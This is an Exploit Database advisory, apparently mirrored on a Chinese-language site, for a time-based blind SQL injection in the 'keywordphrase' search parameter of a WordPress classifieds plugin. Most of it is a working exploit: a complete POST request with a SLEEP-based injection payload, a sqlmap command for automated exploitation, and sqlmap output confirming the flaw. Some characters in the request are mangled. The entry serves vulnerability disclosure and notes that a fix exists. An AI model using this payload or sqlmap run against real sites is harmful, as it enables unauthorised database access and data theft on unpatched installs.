WordPress Plugin Another WordPress Classifieds Plugin – SQL Injection

• Exploit Database
• 36 阅读

• 作者： dill
  日期： 2014-11-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/35204/

• Exploit Title: Another WordPress Classifieds Plugin sql injection and Cross Site Scripting
  Author: dill 
  download: https://wordpress.org/plugins/another-wordpress-classifieds-plugin/Client 
  Webpage: http://awpcp.com/
  
  
  SQL injection
  Details:
  The parameter “keywordphrase” is susceptible to a time-based blind SQL injection when doing a search for classifieds. 
  
  Proof-of-Concept (PoC)
  Request:
  POST /?page_id=16592 HTTP/1.1
  Host: vulnerable.server
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  DNT: 1
  Referer: http://vulnerable.server/?page_id=16592
  Cookie: wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml; wp-settings-time-1=1407957654; wp-settings-time-2=1408136814; PHPSESSID=uk871e0cssdnca8oesorbmg2b6
  Connection: keep-alive
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 371
  a=dosearch&keywordphrase=k'||(SELECT 'ICab' FROM DUAL WHERE 6152=6152 AND SLEEP(5))||'&searchcategory=&searchname=&searchpricemin=1&searchpricemax=2&select-country0.2917955784677633=&textfield-country0.2917955784677633=country®ions[0][country]=country&select-state0.3360776012424508=&textfield-state0.3360776012424508=state®ions[0][state]=State&select-city0.8672109586380441=&textfield-city0.8672109586380441=city®ions[0][city]=city
  
  Exploit through sqlmap: 
  Copy post request to text file
  sqlmap -r keywordphrase.txt -p keywordphrase --dbms=MySQL --level=5
  
  -----------------
  Place: POST
  Parameter: keywordphrase
  Type: AND/OR time-based blind
  Title: MySQL > 5.0.11 AND time-based blind
  Payload: a=dosearch&keywordphrase=k'||(SELECT 'ICab' FROM DUAL WHERE 6152=6152 AND SLEEP(5))||'&searchcategory=&searchname=&searchpricemin=1&searchpricemax=2&select-country0.2917955784677633=&textfield-country0.2917955784677633=country®ions[0][country]=country&select-state0.3360776012424508=&textfield-state0.3360776012424508=State®ions[0][state]=State&select-city0.8672109586380441=&textfield-city0.8672109586380441=City®ions[0][city]=City
  
  Resolution: Developer was contacted and has since corrected the issues. Update to the latest version of the plugin